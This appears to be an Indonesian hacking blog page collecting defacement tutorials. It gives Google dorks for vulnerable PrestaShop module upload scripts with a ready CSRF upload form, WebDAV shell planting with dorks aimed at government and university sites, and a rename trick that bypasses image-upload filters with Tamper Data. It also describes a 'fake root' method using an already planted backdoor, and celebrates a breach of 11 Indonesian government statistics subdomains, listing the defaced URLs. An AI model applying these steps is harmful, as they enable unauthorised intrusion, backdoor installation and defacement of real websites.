Deface Teknik Prestashop File Upload


Hello gengs, kali ini saya Mau Share Tutorial Untuk Deface Terbaru Nih , Maksudnya Tutorial Ini Saya Baru Tau :v

Oke langsung saja , nyari bahan bahan buat di pepes entar pake kata kata mutiara dibawah ini.

Dork : 
   Inurl:"/modules/columnadverts/"
   Inurl:"/modules/homepageadvertise/"
   Inurl:"/modules/productpageadverts/"
   Inurl:"/modules/simpleslideshow/"
   Inurl:"/modules/vtemslideshow/"
   Index Of "/modules/columnadverts/"
   Index Of "/modules/homepageadvertise/"
   Index Of "/modules/productpageadverts/"
   Index Of "/modules/simpleslideshow/"
   Index Of "/modules/vtemslideshow/"

Exploit
 http://loclahost/ modules/columnadverts/uploadimage.php
 http://localhost/ modules/homepageadvertise/uploadimage.php
 http://localhost/ modules/productpageadverts/uploadimage.php
 http://localhost/ modules/simpleslideshow/uploadimage.php
 http://localhost/ modules/vtemslideshow/uploadimage.php

CSRF : 
<form method="POST" action="http://localhost/modules/modules name/uploadimage.php"
enctype="multipart/form-data">
<input type="file" name="userfile" /><button>Upload</button>
</form>


Langsung Ke Tutorialnya.... :*

1. Cari Target Menggunakan Dork !

2. Pilih Salah Satu Situs Yang Ingin Di buat Pepes :v

3. Tambakan Exploit Setelah Url   :*
 http://localhost/ Exploitnya Pilih Satu Persatu !
Jika Vuln Tampilanya Akan Seperti Ini !

4. Copy CSRF Yang Ada Di Atas Tadi   :*
Jangan Lupa Edit Dulu CSRF Tersebut .
 Localhost   >  Website Target .
 Modules Name   >   Nama Exploit Yang Tadi Vuln .
Lalu Simpan Dengan Ex.HTML   > All Files

5. Buka CSRF Tersebut , Upload Shell Backdoor Kamu   :*
Jika Berhasil Akan Terlihat Seperti Ini


6. Dan Sekarang Lihat Letak Shell Nya
 http://localhost/modules/modules name/slides/Name_Shell.php

Kalau Sudah Ketemu Shellnya terserah mau dibuat apain, jangan lupa dikasi Makaso biar syedaapp.

Related Posts:


HACKER RETAS 11 SUBDOMAIN BADAN PUSAT STATISTIK INDONESIA

Kasus peretasan terhadap situs situs pemerintahan dalam negeri masih terus berlanjut. Baru baru ini defacer dengan kodenama wonka,ice-cream serta ./Coco meretas 11 subdomain dari bps.go.id. Ketiga defacer tersebut nampaknya berasal dari komunitas Sanjungan Jiwa dan Indonesian Code Party.

Badan Pusat Statistik adalah Lembaga Pemerintah Non Kementerian yang bertanggung jawab langsung kepada Presiden. Sebelumnya, BPS merupakan Biro Pusat Statistik, yang dibentuk berdasarkan UU Nomor 6 Tahun 1960 tentang Sensus dan UU Nomer 7 Tahun 1960 tentang Statistik.

Berikut list situs yang berhasil diretas :
  1. https://bengkaliskab.bps.go.id/x.htm
  2. https://manggaraibaratkab.bps.go.id/x.htm
  3. https://madiunkota.bps.go.id/x.htm
  4. https://sulteng.bps.go.id/x.htm
  5. https://tapanulitengahkab.bps.go.id/x.htm
  6. https://padangsidimpuankota.bps.go.id/x.htm
  7. https://samosirkab.bps.go.id/x.htm
  8. https://pangkalpinangkota.bps.go.id/x.htm
  9. https://padanglawaskab.bps.go.id/x.htm
  10. https://bombanakab.bps.go.id/x.htm
  11. https://manggaraikab.bps.go.id/x.htm

Pelaku tidak merusak halaman depan situs. Mereka hanya menitipkan sebuah file "x.htm" . namun itu sudah cukup membuktikan mereka berasil masuk ke server subdomain BPS secara ilegal.
Berikut kata kata yang ditinggalkan pelaku peretasan ke sebelas subdomain Badan pusat Statistik tersebut :

Badan Pusat Statistik TOUCHED BY  wonka,ice-cream And ./Coco
Sanjungan Jiwa ~ Indonesian Code Party

Beberapa nama individu maupun tim juga terpampang seperti 
Pak Haxor - Jje Incovers - Malaikat Galau - Antonio HsH - Strlen - Mr.dreamx196 - panataran - konslet - mr.apapedulimu - Mirav Ryu - Nivenzal Attacker - IndoXploit - Indonesia Defacer Tersakiti
Sampai berita ini diturunkan belum ada perbaikan dari situs situs terkait. (jack/lsc)

Related Posts:


Cara Membuat Script Deface Text Dengan Image to Text ACSII

Selamat malam penghuni backdoor. Pada kesempatan kali ini saya akan bagikan tutor cara buat script deface dengan Image to Text atau ACSII Code.

Oke tanpa panjang lebar kali tinggi lagi, langsung saja:

Bahan-bahan yang dibutuhkan :

1. Notepad
2. Foto Mantan
3. Browser support Javascript
4. Koneksi Internet

Langkah-langkah pembuatan:

1. Pertama-tama kunjungi situs http://picascii.com/

2. Upload Foto mantan kalian pada bagian [Choose File]
     Nah disitu ada opsi :
 *Size: mau dikasih angka berapa terserah kalian, kalau misal kegedean kecilin aja, kalau kekecilan digedein aja. (Apanya hayo :v)
 *Color: nah kalau pengen text acsii kalian bewarna tinggal check aja di kolom warnanya, kalau tidak biarkan saja default.

3. Kalau sudah upload dan setting bla bla , langkah terakhir klik tombol [Generate]

4. Jadi Deh, gambar cuma pemanis.

5. Disitu ada opsi buat nge SAVE hasil kalian. Klik pada bagian Get the CODE HTML OR TXT version (with colors or not)


6. Kalian tinggal pilih mau di save dalam bentuk example.html atau example.txt , copy script pada kolom yang disediakan.

7. Langkah terakhir buka Notepad dan...........
 (you know lah :v)


Sekian dari saya, selamat mengeja.

By: ./B4Z1R007 :*

Related Posts:


Deface Website Dengan Webdav [ Hmei7 ]



Persiapkan alatnya terlebih dahulu, ente bisa download DISINI

Cari target dengan dork dibawah ini:
intitle:”index.of” intext:”(Win32) DAV/2″ intext:”Apache”
intitle:”index.of” intext:”(Win32) DAV/2″ intext:”Apache” site:edu
intitle:”index.of” intext:”(Win32) DAV/2″ intext:”Apache” site:gov
intitle:”index.of” intext:”(Win32) DAV/2″ intext:”Apache” site:YOURCOUNTRY (misal: my, us, th. dll)
inurl:webdav
inurl:.com.x/*.asp
inurl:.edu.x/*.asp
inurl:.gov.x/*.asp
inurl:.net.x/*.asp
inurl:.org.x/*.asp


Jika sudah extrack File yang didownload tadi . Lalu Buka Rootkit seperti gambar dibawah ini :
Kemudian buka Rootkit, Terus pilih tab "WebDav - Asp Shell Maker"



Jika sudah muncul tampilan seperti dibawah ini, lalu klik "Setting"

Klik "Load Shell From File"untuk memuat script deface kita



Pilih script deface kita kemudian klik "Open"



Jika script deface telah dimuat sekarang kita tambahkan target dengan cara klik "Add Site" lalu masukan site target, Contoh "http://www.edicot.com" kemudian klik "OK"




Sekarang saatnya klik "Serang!!!" , kalo berhasil nanti akan muncul notif seperti gambar dibawah ini ! apabila berhasil silahkan copykan alamat shell yang udah ketanam . contoh nomor 3 :




Pastekan alamat shell yang sudah dicopy pada adress bar dibrowser ente & lihat hasilnya ..

Related Posts:


Deface Web Adsvertise Banner & Iklan dengan Tamper Data


Kali ini saya akan membagikan tutorial Upload Shell dengan Tamper data. Banyak jalan untuk masuk ke sebuah sistem, apalagi jika sistem menyediakan media uploader. Maka bersiaplah untuk menjadi tempat eksploitasi para pengunjung gelap. Oke langsung saja dari pada pidato lama-lama :v

Bahan-bahan :
  • Mozila Browser
  • Tamper Data
Dork : inurl:/banner/pasang/ ( Bisa dikembangin sendiri )

Berikut tampilan form untuk memasang banner :

Kemudian isi data tersebut bebas. Pada FILE BANNER kita upload shell kita yang sudah direname, Contoh : Shell.php toShell.php.jpg


Nah kalo udah direname dan di isi datanya, sekarang buka Tamper Data dibrowser


Lalu start Tamper Data dengan mengklik Start Tamper


Selanjutnya klik pasang/submit pada Form pasang banner tadi, maka akan muncul Notif & klik tamper. Cari Shell.php.jpg & Rename kembali jadi Shell.php, Kalo sudah selesai Klik OK


Jika muncul notif lagi klik aja submit, akses shell : http://www.site.com/images/bnrs/Shell.php

Related Posts:


Deface dengan metode ~Fake Root mudah



Fake root adalah suatu metode deface dimana kita tidak benar-benar meng-root suatu website, metode ini sangatlah mudah & tidak semua mirror bisa memirror web hasil deface tersebut

Oke langsung aja nih alat-alatnya :
1. Shell Backdoor Yang Sudah Tertanam
2. Script Deface

Langkah-langkah :
1. Pergi ke dir "public_html" pada shell backdoor


2. Upload script deface kalian pada "public_html" , Contoh : BCT.html

3. Langkah selanjutnya pergi ke SINI untuk melakukan Reserve IP

4. Letakan target anda pada Form Remote Adress, Contoh : Smeltacommunity.com


5. Kemudian klik check maka akan muncul domain-domain dengan IP yang sama


6. Lihat tulisan dibelakang "public_html", contoh : /home/smeltaco/public_html/

7. Langkah terakhir adalah test web tersebut dengan salah satu domain yang telah di Reserve IP, sebagai contoh : http://www.bestbuycellphones.net/~smeltaco/BCT.html 

Nah sekoan dari saya, selamat mencoba.

Related Posts: